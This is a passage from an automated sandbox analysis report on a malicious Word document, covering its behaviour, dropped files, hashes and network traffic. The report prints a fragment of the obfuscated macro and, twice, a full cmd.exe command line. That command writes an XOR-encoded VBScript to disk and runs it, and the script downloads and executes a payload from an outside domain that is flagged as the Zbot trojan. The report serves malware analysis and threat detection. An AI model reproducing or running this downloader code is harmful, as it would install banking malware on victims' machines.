Ehh = Ehh + Ehh
Case Else
Ehh = Ehh - 1
End Select
TV0BzB = 26
Select Case TV0BzB
Case 57
TV0BzB = TV0BzB + 1
Case 9
TV0BzB = TV0BzB + TV0BzB
Case Else
TV0BzB = TV0BzB - 1
End Select
End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\~DF17F10AB4E6DDDBC1.TMP"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-60330"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-60330"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6B640000
- source
- Loaded Module
-
Runs shell commands
- details
-
"/V /C set "VFiOY=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM MgWH" "fUNcTiON Dtds6J(Locu)" "Gu3=46" "Dtds6J=aSC(Locu)" "Mc=34" "EnD fUnCtion" "sUb SAja()" "BhP4Zq9=50" "Dim Oip
BXCNxmr" "For Oip = 3 To 2000357" "BXCNxmr = Oipe + 59 + 64 + 48" "Next" "UpR1=50" "End sUb" "SuB P6()" "UjuTSe=52" "EwGZLb=96422237" "VOlHk=88" "fOr MsFa=1 To EwGZLb" "ComMhC=ComMhC+1" "nEXt" "Wz0hpZ=96" "If ComMhC=EwGZLb thEn" "J6Iwr=46" "KklN((-1782+1786))" "FahDO8k=49" "UfYR5N(C5q("214215486A636646004C313C2559145E7E2F265B4E5C3138281803513E","LI6a8P"))" "LgSt=86" "enD If" "PweRTZP=83" "eND suB" "Ok=78" "P6" "suB KklN(Ct7)" "Rt=70" "DiM V3z44" "M48IeHl=67" "V3z44=tiMer+Ct7" "Do WhiLE TIMEr<V3z44" "Loop" "FmfJFkX=46" "eND SuB" "suB WJ()" "GAm=64" "dIM L8
GIw" "CfqzQ=50" "dO WhiLE L8<>2399-2398" "GIw=GIw+1" "Loop" "KO=32" "ENd SuB" "FUnCTION OCL8(C5WeAKJ,RhH)" "F6gWH=26" "DiM V70338G
NELKok
MquhqW4
ARoLF
XFY(5)" "JKLVL5=12" "XFY(5)=52" "WdL=65" "XFY(2)=107" "VGuQs=29" "XFY(3)=50" "Tx=74" "XFY(0)=104" "KcbM=14" "XFY(4)=54" "MHWU7=3" "XFY(1)=100" "T0nC=84" "BH=78" "SEt V70338G=crEateOBjEct(C5q("202C0126033B1A21146135261F2A2036003B16223C2D192A103B", "Os"))" "LzwWOCu=82" "sET NELKok=V70338G.GETfiLE(C5WeAKJ)" "RCkeymC=55" "SEt ARoLF=NELKok.opEnasTexTsTREAM(4099-4098,2858-2858)" "Kb=30" "SeT MquhqW4=V70338G.cREateTEXtFIlE(RhH,6169-6168,7237-7237)" "V4A6Wn=25" "dO UnTIL ARoLF.AteNDOfsTReAM" "MquhqW4.WRiTE Dpa6I(SIaQdx(Dtds6J(ARoLF.REad(4419-4418))
XFY(0)))" "lOop" "Mp5XgB=7" "MquhqW4.CLose" "SqpEda=57" "ARoLF.cLOSE" "N1oqA=11" "EnD funCtiOn" "sUB PeZxmzF(DFTbB)" "Crijd5W=95" "Dim FPiAJMz" "Db5=56" "RvE="LH03"" "Rv=10" "SEt FPiAJMz=CrEaTeOBJECt(C5q("09747C080A1E60383A555221",RvE))" "QGu4Xi6=54" "FPiAJMz.opEn" "UyYE=48" "FPiAJMz.TyPE=442-441" "XFV=49" "FPiAJMz.WrItE DFTbB" "IbEE=44" "FPiAJMz.SaveToFIlE MgWH & C5q("560D081E","CxaOstv")
9121-9119" "Ryh1i5=89" "FPiAJMz.clOse" "OtiDwT=13" "OYw5u" "QifCuY=58" "End sUB" "SUb OYw5u()" "L1=51" "TXsz2=""""" "D3W=52" "R1=MgWH & Ic2Og & C5q("782B6713","EVy3")" "BNUq=96" "JmlZ=C5q("3721316C313430627B0F7511000D0716746E776276","BTLU")" "QIk=85" "OCL8 MgWH & C5q("1A250D1D","Y4IJp")
R1" "Bf=82" "iF Ny="" THen KklN((915-911))" "L7nMFX=15" "YxV31="I1t"" "WOpbfK2=41" "sET MQY=crEatEoBjeCT(C5q("66272A431D39455A1A5911255D",YxV31))" "Odx=95" "MQY.rUn JmlZ & R1 & TXsz2
6397-6397
3340-3340" "BbDH=44" "eND SUb" "FUNctioN C5q(LKbD0x,QUhy5y)" "LZ=21" "diM S5OUdXn
GhI92m
QxE" "Yoo=87" "For S5OUdXn=1 To (leN(LKbD0x)/2)" "GhI92m=(Dpa6I((-3486+3524)) & Dpa6I((343080/4765))&(MId(LKbD0x,(S5OUdXn+S5OUdXn)-1
2)))" "QxE=(Dtds6J(miD(QUhy5y,((S5OUdXn MoD lEn(QUhy5y))+1)
1)))" "C5q=C5q+Dpa6I(SIaQdx(GhI92m,QxE))" "NExt" "KPr=93" "enD fUncTION" "FUnCtion SIaQdx(UF,K4)" "ET=32" "SIaQdx=(UF ANd NOt K4)oR(nOt UF ANd K4)" "Y0=58" "eND FuncTion" "FuNcTion UfYR5N(IWBjR)" "OczshVC=94" "diM Td2
WLa3" "W8oj0Gh=31" "Bz8bR="VS7FS"" "RAg4nr9=86" "On eRror rESume NExt" "PZfR=17" "VnVHG="EJm7d"" "Vsz7=87" "SEt Td2=crEatEObject(C5q("1D3E54162C3A1919372D2F015B",VnVHG))" "Fxyv=65" "Y9iw="CxaOstv"" "SAja" "TS=33" "Set Iiu3v=Td2.ENVironmeNT(C5q("06302A0F030531","FVbeL"))" "X0i6mxo=33" "MgWH=Iiu3v(C5q("72126306721672","B3"))&Dpa6I((1402-1310))& Ic2Og & Ic2Og" "NBSa=47" "WzEa="WIgM"" "L9Pva=67" "SEt WLa3=crEaTeObjECT(C5q("040E2E25261422313D49151A052F190319",WzEa))" "OafZ=60" "WLa3.oPeN C5q("160A3D","XQOijh")
IWBjR
9170-9170" "QGh=16" "WLa3.SEnd()" "Of0e3V8=64" "if WLa3.sTatuS=(749-549) then" "T6Q1k=34" "SAja" "G39k=98" "KklN((12128/3032))" "SiyOlF=98" "PeZxmzF WLa3.RESpONsEBOdY" "PQrK=83" "Else" "DDAByn=88" "CD="DX04vuI"" "Lt6nMZT=66" "seT WLa3= cReATeoBjeCT(C5q("155957041A3A2B3E441A2E38050C0C6464",CD))" "Abin=76" "WLa3.OpeN C5q("721C07","K5YSx9")
C5q("04361832566D43705C7542775B6C546C5E775D6D082318234220052C","Bl" )
5086-5086" "Tqc3=18" "WLa3.sEnD()" "QG0L=8" "If WLa3.STatUS=(1358600/6793)thEn PeZxmzF WLa3.ReSPoNSEbody" "Ya7t=39" "Tce=77" "end if" "BpD7kX=24" "ENd fUnCTioN" "FUNctiON Dpa6I(UvJc)" "YQ9vMhv=34" "Dpa6I=chR(UvJc)" "ALhv=92" "eND FUNCtIon" "FUNCTIoN Ic2Og()" "RcI4YCd=23" "Ic2Og=SEcOND(tIME)" "Krqu5Bu=47" "eNd fUNction") do @echo %~i)>"!VFiOY!" && start "" "!VFiOY!"" on 2016-8-8.07:27:00.751 - source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with the commandline listed under "Runs shell commands" above
Spawned process "wscript.exe" with commandline ""%APPDATA%\1948.vbs"" - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistence
-
Dropped files
- details
-
"~WRS{970CBB03-0673-49D2-8698-D021578856D1}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"index.dat" has type "data"
"data[1].bin" has type "data"
"ExcludeDictionaryEN0409.lex" has type "Little-endian UTF-16 Unicode text with no line terminators"
"00.lGm" has type "data"
"000.RTV" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"801ea405250a6dc559ff34cd0157095d37982a806d5498e53a4498c0976301c8.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Hidden Archive ctime=Mon Aug 8 13:50:22 2016 mtime=Mon Aug 8 13:50:22 2016 atime=Mon Aug 8 22:49:26 2016 length=228864 window=hide"
"~$1ea405250a6dc559ff34cd0157095d37982a806d5498e53a4498c0976301c8.doc" has type "data"
"~$Normal.dotm" has type "data"
"1948.vbs" has type "ASCII text with CRLF line terminators"
"~WRS{8D607A42-AAF5-4B6F-895A-2422510A9C4F}.tmp" has type "data" - source
- Binary File
- relevance
- 3/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://www.iec.ch"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://www.iec.chIEC"
Heuristic match: "pataplouf.com" - source
- File/Memory
- relevance
- 10/10
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
- "Writability syringas resurgences overdevotion rezbanyite twittery bidirectionally manifestationist epactal onerousness ballone lophobranchiate dumontite papaloi. Femininity hendecacolic underachieving hounders jesuited overtimed preimagining birma gamogenetically windlessness. Polymorphy undersleep motatorious antirationalistic superfantastic connexion abdicant hantle monobrominated subnote uncontingent nebalian disciplinarianism. Adsorbing unsafeness premourn destool anarchism bosoming astel substanceless crackings endophagous whetting cephalophine knee. Scape sociologism alumna baidarka tasajillos multitask bedewing rotundly nectarized icekhana cabbalas californiana outshot. Gazy imbathe electrogenic rooinek discovert rubine sagginess cacam." (Indicator: "twitter")
- source
- File/Memory
- relevance
- 7/10
File Details
Tortor PC.contractq01rh.17o-o34u53j.rtf
- Filename
- Tortor PC.contractq01rh.17o-o34u53j.rtf
- Size
- 224KiB (228864 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: outjuggling , Template: Normal.dotm, Last Saved By: hedgebote , Revision Number: 4, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jun 3 22:27:00 2016, Last Saved Time/Date: Sun Aug 7 02:10:00 2016, Number of Pages: 1, Number of Words: 9848, Number of Characters: 56136, Security: 0
- Architecture
- WINDOWS
- SHA256
- 801ea405250a6dc559ff34cd0157095d37982a806d5498e53a4498c0976301c8
- MD5
- a28c664ba613e41aa35d917e9ef24c00
- SHA1
- 8f4ade42f2a70ee14fd376d3fceed7fba727924b
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Hybrid Analysis
Analysed 3 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\801ea405250a6dc559ff34cd0157095d37982a806d5498e53a4498c0976301c8.doc"
(PID: 2820)
-
cmd.exe
/V /C set "VFiOY=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM MgWH" "fUNcTiON Dtds6J(Locu)" "Gu3=46" "Dtds6J=aSC(Locu)" "Mc=34" "EnD fUnCtion" "sUb SAja()" "BhP4Zq9=50" "Dim Oip, BXCNxmr" "For Oip = 3 To 2000357" "BXCNxmr = Oipe + 59 + 64 + 48" "Next" "UpR1=50" "End sUb" "SuB P6()" "UjuTSe=52" "EwGZLb=96422237" "VOlHk=88" "fOr MsFa=1 To EwGZLb" "ComMhC=ComMhC+1" "nEXt" "Wz0hpZ=96" "If ComMhC=EwGZLb thEn" "J6Iwr=46" "KklN((-1782+1786))" "FahDO8k=49" "UfYR5N(C5q("214215486A636646004C313C2559145E7E2F265B4E5C3138281803513E","LI6a8P"))" "LgSt=86" "enD If" "PweRTZP=83" "eND suB" "Ok=78" "P6" "suB KklN(Ct7)" "Rt=70" "DiM V3z44" "M48IeHl=67" "V3z44=tiMer+Ct7" "Do WhiLE TIMEr<V3z44" "Loop" "FmfJFkX=46" "eND SuB" "suB WJ()" "GAm=64" "dIM L8,GIw" "CfqzQ=50" "dO WhiLE L8<>2399-2398" "GIw=GIw+1" "Loop" "KO=32" "ENd SuB" "FUnCTION OCL8(C5WeAKJ,RhH)" "F6gWH=26" "DiM V70338G,NELKok,MquhqW4,ARoLF,XFY(5)" "JKLVL5=12" "XFY(5)=52" "WdL=65" "XFY(2)=107" "VGuQs=29" "XFY(3)=50" "Tx=74" "XFY(0)=104" "KcbM=14" "XFY(4)=54" "MHWU7=3" "XFY(1)=100" "T0nC=84" "BH=78" "SEt V70338G=crEateOBjEct(C5q("202C0126033B1A21146135261F2A2036003B16223C2D192A103B", "Os"))" "LzwWOCu=82" "sET NELKok=V70338G.GETfiLE(C5WeAKJ)" "RCkeymC=55" "SEt ARoLF=NELKok.opEnasTexTsTREAM(4099-4098,2858-2858)" "Kb=30" "SeT MquhqW4=V70338G.cREateTEXtFIlE(RhH,6169-6168,7237-7237)" "V4A6Wn=25" "dO UnTIL ARoLF.AteNDOfsTReAM" "MquhqW4.WRiTE Dpa6I(SIaQdx(Dtds6J(ARoLF.REad(4419-4418)),XFY(0)))" "lOop" "Mp5XgB=7" "MquhqW4.CLose" "SqpEda=57" "ARoLF.cLOSE" "N1oqA=11" "EnD funCtiOn" "sUB PeZxmzF(DFTbB)" "Crijd5W=95" "Dim FPiAJMz" "Db5=56" "RvE="LH03"" "Rv=10" "SEt FPiAJMz=CrEaTeOBJECt(C5q("09747C080A1E60383A555221",RvE))" "QGu4Xi6=54" "FPiAJMz.opEn" "UyYE=48" "FPiAJMz.TyPE=442-441" "XFV=49" "FPiAJMz.WrItE DFTbB" "IbEE=44" "FPiAJMz.SaveToFIlE MgWH & C5q("560D081E","CxaOstv"),9121-9119" "Ryh1i5=89" "FPiAJMz.clOse" "OtiDwT=13" "OYw5u" "QifCuY=58" "End sUB" "SUb OYw5u()" "L1=51" "TXsz2=""""" "D3W=52" "R1=MgWH & Ic2Og & C5q("782B6713","EVy3")" 
"BNUq=96" "JmlZ=C5q("3721316C313430627B0F7511000D0716746E776276","BTLU")" "QIk=85" "OCL8 MgWH & C5q("1A250D1D","Y4IJp"),R1" "Bf=82" "iF Ny="" THen KklN((915-911))" "L7nMFX=15" "YxV31="I1t"" "WOpbfK2=41" "sET MQY=crEatEoBjeCT(C5q("66272A431D39455A1A5911255D",YxV31))" "Odx=95" "MQY.rUn JmlZ & R1 & TXsz2,6397-6397,3340-3340" "BbDH=44" "eND SUb" "FUNctioN C5q(LKbD0x,QUhy5y)" "LZ=21" "diM S5OUdXn,GhI92m,QxE" "Yoo=87" "For S5OUdXn=1 To (leN(LKbD0x)/2)" "GhI92m=(Dpa6I((-3486+3524)) & Dpa6I((343080/4765))&(MId(LKbD0x,(S5OUdXn+S5OUdXn)-1,2)))" "QxE=(Dtds6J(miD(QUhy5y,((S5OUdXn MoD lEn(QUhy5y))+1),1)))" "C5q=C5q+Dpa6I(SIaQdx(GhI92m,QxE))" "NExt" "KPr=93" "enD fUncTION" "FUnCtion SIaQdx(UF,K4)" "ET=32" "SIaQdx=(UF ANd NOt K4)oR(nOt UF ANd K4)" "Y0=58" "eND FuncTion" "FuNcTion UfYR5N(IWBjR)" "OczshVC=94" "diM Td2,WLa3" "W8oj0Gh=31" "Bz8bR="VS7FS"" "RAg4nr9=86" "On eRror rESume NExt" "PZfR=17" "VnVHG="EJm7d"" "Vsz7=87" "SEt Td2=crEatEObject(C5q("1D3E54162C3A1919372D2F015B",VnVHG))" "Fxyv=65" "Y9iw="CxaOstv"" "SAja" "TS=33" "Set Iiu3v=Td2.ENVironmeNT(C5q("06302A0F030531","FVbeL"))" "X0i6mxo=33" "MgWH=Iiu3v(C5q("72126306721672","B3"))&Dpa6I((1402-1310))& Ic2Og & Ic2Og" "NBSa=47" "WzEa="WIgM"" "L9Pva=67" "SEt WLa3=crEaTeObjECT(C5q("040E2E25261422313D49151A052F190319",WzEa))" "OafZ=60" "WLa3.oPeN C5q("160A3D","XQOijh"),IWBjR,9170-9170" "QGh=16" "WLa3.SEnd()" "Of0e3V8=64" "if WLa3.sTatuS=(749-549) then" "T6Q1k=34" "SAja" "G39k=98" "KklN((12128/3032))" "SiyOlF=98" "PeZxmzF WLa3.RESpONsEBOdY" "PQrK=83" "Else" "DDAByn=88" "CD="DX04vuI"" "Lt6nMZT=66" "seT WLa3= cReATeoBjeCT(C5q("155957041A3A2B3E441A2E38050C0C6464",CD))" "Abin=76" "WLa3.OpeN C5q("721C07","K5YSx9"),C5q("04361832566D43705C7542775B6C546C5E775D6D082318234220052C","Bl" ),5086-5086" "Tqc3=18" "WLa3.sEnD()" "QG0L=8" "If WLa3.STatUS=(1358600/6793)thEn PeZxmzF WLa3.ReSPoNSEbody" "Ya7t=39" "Tce=77" "end if" "BpD7kX=24" "ENd fUnCTioN" "FUNctiON Dpa6I(UvJc)" "YQ9vMhv=34" "Dpa6I=chR(UvJc)" "ALhv=92" "eND FUNCtIon" "FUNCTIoN Ic2Og()" 
"RcI4YCd=23" "Ic2Og=SEcOND(tIME)" "Krqu5Bu=47" "eNd fUNction") do @echo %~i)>"!VFiOY!" && start "" "!VFiOY!"
(PID: 3408)
- wscript.exe "%APPDATA%\1948.vbs" (PID: 3196)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
pataplouf.com | 213.186.33.168 | - | France |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
213.186.33.168 | 80 TCP | wscript.exe PID: 3196 | France ASN: 16276 (OVH SAS) |
HTTP Traffic
Endpoint | Request | URL |
---|---|---|
213.186.33.168:80 (pataplouf.com) | GET | pataplouf.com/data.bin |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 213.186.33.168:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin | 2018052 |
Extracted Files
-
Informative 11
-
-
~WRS{970CBB03-0673-49D2-8698-D021578856D1}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
index.dat
- Size
- 540B (540 bytes)
- Type
- data
- MD5
- d7e2c45bf740a2c680a1ad6f0e4bdc7e
- SHA1
- e8c9299607a62736e2258f1f8382fa59c0364ab2
- SHA256
- a21d2089d291358538eddeb7541fe5046f2649678d84db70c889bedb5378e77f
-
data[1].bin
- Size
- 373KiB (381571 bytes)
- Type
- data
- MD5
- 3f9ad3c1ad05533cbdc9f050d73dcf1b
- SHA1
- 0b8b91665ec4378269f1e6c6cfe2f65450a2bb71
- SHA256
- 685ac950f5720f574f608c74cf1a9d937db05a0245dec85c419d5e35088b0df0
-
ExcludeDictionaryEN0409.lex
- Size
- 2B (2 bytes)
- Type
- Little-endian UTF-16 Unicode text, with no line terminators
- MD5
- f3b25701fe362ec84616a93a45ce9998
- SHA1
- d62636d8caec13f04e28442a0a6fa1afeb024bbb
- SHA256
- b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
-
00.lGm
- Size
- 373KiB (381571 bytes)
- Type
- data
- MD5
- 3f9ad3c1ad05533cbdc9f050d73dcf1b
- SHA1
- 0b8b91665ec4378269f1e6c6cfe2f65450a2bb71
- SHA256
- 685ac950f5720f574f608c74cf1a9d937db05a0245dec85c419d5e35088b0df0
-
000.RTV
- Size
- 54KiB (55611 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows
- MD5
- 733870688ffc79cafbd00b0a7f2bcdfd
- SHA1
- 624a240b5f3bc660fc7bf14b306553deb8b23c83
- SHA256
- a67a319f8f08e794adb89a5bad4d5037abf51e0bbea71c4e69c4a46b6d4cbe18
-
801ea405250a6dc559ff34cd0157095d37982a806d5498e53a4498c0976301c8.LNK
- Size
- 733B (733 bytes)
- Type
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Mon Aug 8 13:50:22 2016, mtime=Mon Aug 8 13:50:22 2016, atime=Mon Aug 8 22:49:26 2016, length=228864, window=hide
- MD5
- 63ddc240faaceb94aecf967126d6d4fd
- SHA1
- 3b3d88d7014749f2a53a82e841649feb1f0bf1a1
- SHA256
- 5da8138189b73df76b5c2269a26ddb42da33070c542d8cfce3c0fde37ab3fd33
-
~$1ea405250a6dc559ff34cd0157095d37982a806d5498e53a4498c0976301c8.doc
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 21e713fa03e4604554006c6228349162
- SHA1
- 5aa472878b4dfdb66bddaa96eb30bcd0c4d890c7
- SHA256
- a3e6f1edd1219b726d0c899e7883f7580ac525b41eb1121df02cab2302613b3c
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 21e713fa03e4604554006c6228349162
- SHA1
- 5aa472878b4dfdb66bddaa96eb30bcd0c4d890c7
- SHA256
- a3e6f1edd1219b726d0c899e7883f7580ac525b41eb1121df02cab2302613b3c
-
1948.vbs
- Size
- 3.7KiB (3803 bytes)
- Type
- ASCII text, with CRLF line terminators
- MD5
- c4d732f3b9df5db32705dc8179562a67
- SHA1
- a04235f7f2bf1c446969a5726ee7f9f46f0c869a
- SHA256
- 99a9f12dff907e90eb9e2b77dcdc0d0ce09cafe912abbce6d9be3a96f078a01f
-
~WRS{8D607A42-AAF5-4B6F-895A-2422510A9C4F}.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- MD5
- f1d3656dae9e9b6d19a21086a76d758c
- SHA1
- 55443d3cb79a24f5b341c0f107fff772edaadc15
- SHA256
- f5ff55c843a45d305ded6794a6f81383594deba6ec94a0481005bec75f7e959d
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Dropped file "000.RTV" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/a67a319f8f08e794adb89a5bad4d5037abf51e0bbea71c4e69c4a46b6d4cbe18/analysis/1470664757/")
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report